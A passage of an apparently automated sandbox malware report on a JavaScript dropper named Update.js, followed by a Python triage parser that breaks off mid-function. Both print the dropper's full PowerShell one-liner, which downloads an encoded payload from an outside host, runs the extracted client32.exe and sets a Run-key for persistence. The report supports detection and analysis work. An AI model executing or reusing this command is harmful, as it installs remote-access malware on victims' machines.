Source: powershell.exe, 00000008.00000002.1567156116.0000026C00001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ggoryo.com/trade/da.php?9800
Source: wscript.exe, 00000000.00000003.1369359764.000001FC5575A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1389692516.000001FC555C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1347982626.000001FC4FC26000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1244089717.000001FC54A57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ggoryo.com/trade/fix.php?6867
Source: wscript.exe, 00000000.00000003.1347982626.000001FC4FC26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ggoryo.com/trade/fix.php?6867EF
Source: powershell.exe, 00000008.00000002.1567156116.0000026C018BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C016AF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: wscript.exe, 00000000.00000003.1366341815.000001FC53AFF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235146786.000001FC52487000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1348423839.000001FC57BD1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1243375949.000001FC518D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1234062822.000001FC52877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1236345430.000001FC53047000.00000004.00000020.00020000.00000000.sdmp, Update.js String found in binary or memory: https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
Source: powershell.exe, 00000008.00000002.1567156116.0000026C00F61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000008.00000002.1738259741.0000026C1006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C01A34000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000008.00000002.1567156116.0000026C016AF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.org
Source: wscript.exe, 00000000.00000003.1235146786.000001FC52487000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1388374479.000001FC55692000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1348423839.000001FC57BD1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1255625344.000001FC51AFE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1234062822.000001FC52877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1236345430.000001FC53047000.00000004.00000020.00020000.00000000.sdmp, Update.js String found in binary or memory: https://www-googleapis-staging.sandbox.google.com
Source: wscript.exe, 00000000.00000003.1235146786.000001FC52487000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1348423839.000001FC57BD1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1355050587.000001FC57D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1234062822.000001FC52877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1236345430.000001FC53047000.00000004.00000020.00020000.00000000.sdmp, Update.js String found in binary or memory: https://www.google.com/intl/en-US/chrome/blank.html
Source: wscript.exe, 00000000.00000003.1253318916.000001FC539D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/intl/en-US/chrome/blank.htmlX
Source: wscript.exe, 00000000.00000003.1416060813.000001FC5443D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/intl/en-US/chrome/blank.htmlXVNT
Source: wscript.exe, 00000000.00000003.1235146786.000001FC52487000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1348423839.000001FC57BD1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1255625344.000001FC51AFE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1234062822.000001FC52877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1236345430.000001FC53047000.00000004.00000020.00020000.00000000.sdmp, Update.js String found in binary or memory: https://www.googleapis.com
Source: wscript.exe, 00000000.00000003.1388374479.000001FC55692000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.comp
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown HTTPS traffic detected: 77.83.199.112:443 -> 192.168.2.16:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 77.83.199.112:443 -> 192.168.2.16:49707 version: TLS 1.2
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1101FC20 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard, 10_2_1101FC20
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_110335A0 GetClipboardFormatNameA,SetClipboardData, 10_2_110335A0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1101FC20 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard, 10_2_1101FC20
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11033320 IsClipboardFormatAvailable,GetClipboardData,GetClipboardFormatNameA,GetLastError,GlobalUnlock, 10_2_11033320
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_110077A0 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor, 10_2_110077A0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11114590 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState, 10_2_11114590
Source: Yara match File source: 10.2.client32.exe.111b8c68.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.client32.exe.11000000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: client32.exe PID: 4108, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICL32.DLL, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_111165C0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA, 10_2_111165C0

System Summary

Source: amsi64_7024.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: sslproxydump.pcap, type: PCAP Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: wscript.exe PID: 7024, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6704, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICL32.DLL Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\remcmdstub.exe Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\TCCTL32.DLL Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\HTCTL32.DLL Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICHEK.DLL Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\msvcr100.dll Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\pcicapi.dll Jump to dropped file
Source: C:\Windows\System32\wscript.exe COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4} Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD; Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Process Stats: CPU usage > 24%
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11113190: GetKeyState,DeviceIoControl,keybd_event, 10_2_11113190
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1115EA00 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec, 10_2_1115EA00
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess, 10_2_1102D9F4
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess, 10_2_1102DD21
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECBFA14EE 8_2_00007FFECBFA14EE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECBFA2500 8_2_00007FFECBFA2500
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECBFA2212 8_2_00007FFECBFA2212
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECBFAAAD3 8_2_00007FFECBFAAAD3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECBFA172F 8_2_00007FFECBFA172F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECC4B704A 8_2_00007FFECC4B704A
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11073680 10_2_11073680
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11029BB0 10_2_11029BB0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_110627B0 10_2_110627B0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_110336D0 10_2_110336D0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11051800 10_2_11051800
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1115F840 10_2_1115F840
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1102BD40 10_2_1102BD40
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1101BCD0 10_2_1101BCD0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11087F50 10_2_11087F50
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11045E70 10_2_11045E70
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1101C110 10_2_1101C110
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_111640E0 10_2_111640E0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11168345 10_2_11168345
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_111265B0 10_2_111265B0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11070430 10_2_11070430
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11080740 10_2_11080740
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1100892B 10_2_1100892B
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1101CF30 10_2_1101CF30
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1116EE8B 10_2_1116EE8B
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_6CA8A980 10_2_6CA8A980
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\HTCTL32.DLL 3C072532BF7674D0C5154D4D22A9D9C0173530C0D00F69911CDBC2552175D899
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICHEK.DLL 956B9FA960F913CCE3137089C601F3C64CC24C54614B02BBA62ABB9610A985DD
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Process token adjusted: Security Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: String function: 11161299 appears 41 times
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: String function: 11027F40 appears 47 times
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: String function: 11164ED0 appears 32 times
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: String function: 11147060 appears 594 times
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: String function: 1105E820 appears 293 times
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: String function: 6CA97D00 appears 32 times
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: String function: 11081E70 appears 46 times
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: String function: 11029A70 appears 1003 times
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: String function: 1116FED0 appears 37 times
Source: Update.js Initial sample: Strings found which are bigger than 50
Source: amsi64_7024.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: sslproxydump.pcap, type: PCAP Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: wscript.exe PID: 7024, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6704, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.rans.troj.expl.evad.winJS@6/28@2/3
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1105A760 GetLastError,FormatMessageA,LocalFree, 10_2_1105A760
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1109D860 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges, 10_2_1109D860
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1109D8F0 AdjustTokenPrivileges,CloseHandle, 10_2_1109D8F0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11116880 CoInitialize,CoCreateInstance,LoadLibraryA,GetProcAddress,SHGetSettings,FreeLibrary,CoUninitialize, 10_2_11116880
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11089430 FindResourceA,LoadResource,LockResource, 10_2_11089430
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11128B10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError, 10_2_11128B10
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3 Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6712:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_febnwrhp.qfn.ps1 Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe "C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD; Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe "C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe" Jump to behavior
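Added triage example, not part of the Joe Sandbox report and not code from the sample: a small Python parser that takes a process-creation record carrying the wscript.exe -> powershell.exe command line recorded above, tags each stage of the one-liner (policy bypass, DownloadString, FromBase64String, WriteAllBytes, ZipFile extraction, Start-Process, hidden attribute, HKCU Run write), resolves the randomly named variables so the Run-key arguments and the URL are readable again, and enumerates every drop-folder name the Get-Random suffix can produce. The "Field: value | Field: value" log layout, the tag names and the regexes are assumptions of this example; the command line itself is the one the report records.

```python
# Added example, not from the report or Joe Sandbox. SAMPLE_EVENT is constructed: the
# command line recorded above, wrapped in an assumed "Field: value | Field: value" layout.
import json
import re

SAMPLE_EVENT = (
    r"ParentImage: C:\Windows\System32\wscript.exe | "
    r"Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "
    r'CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C '
    r"$VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';"
    r"$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);"
    r"$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; "
    r"$JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;"
    r"if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };"
    r"$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);"
    r"try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)}"
    r" catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';"
    r"if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};"
    r"$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';"
    r"$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';"
    r"New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;"
)

# One case-insensitive pattern per stage of the one-liner. The tag names are ours.
BEHAVIOURS = {
    "execution-policy-bypass": r"-Ex(?:ecutionPolicy)?\s+Bypass",
    "no-profile": r"-NoP(?:rofile)?\b",
    "remote-download": r"\.DownloadString\(|\.DownloadFile\(|Invoke-WebRequest",
    "base64-decode": r"FromBase64String\(",
    "write-payload": r"WriteAllBytes\(",
    "zip-extract": r"ZipFile\]::ExtractToDirectory",
    "launch-dropped-exe": r"Start-Process\s+-FilePath",
    "hide-directory": r"\.attributes\s*=\s*'Hidden'",
    "hkcu-run-persistence": r"CurrentVersion\\Run",
}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}


def get_field(event, name):
    """Pull one 'Name: value' field out of the assumed log layout."""
    m = re.search(rf"(?<!\w){name}:\s*(.*?)(?=\s\|\s\w+:|$)", event)
    return m.group(1).strip() if m else ""


def script_host_parent(event):
    """True when PowerShell was spawned by the Windows Script Host (the dropper pattern)."""
    parent = get_field(event, "ParentImage").rsplit("\\", 1)[-1].lower()
    return parent in SCRIPT_HOSTS


def match_behaviours(cmdline):
    return [tag for tag, pat in BEHAVIOURS.items() if re.search(pat, cmdline, re.IGNORECASE)]


def string_vars(cmdline):
    """Collect $name='literal' assignments plus one level of $base+'literal' concatenation,
    so the randomly named variables no longer hide the cmdlet arguments."""
    env = dict(re.findall(r"\$(\w+)\s*=\s*'([^']*)'", cmdline))
    for name, base, lit in re.findall(r"\$(\w+)\s*=\s*\$(\w+)\+'([^']*)'", cmdline):
        env[name] = env.get(base, "$" + base) + lit  # an unresolved base stays as "$base"
    return env


def urls(cmdline):
    return re.findall(r"https?://[^\s'\";)]+", cmdline)


def persistence(cmdline):
    """Recover the Run-key write: New-ItemProperty -Path $k -Name $v -Value $s."""
    env = string_vars(cmdline)
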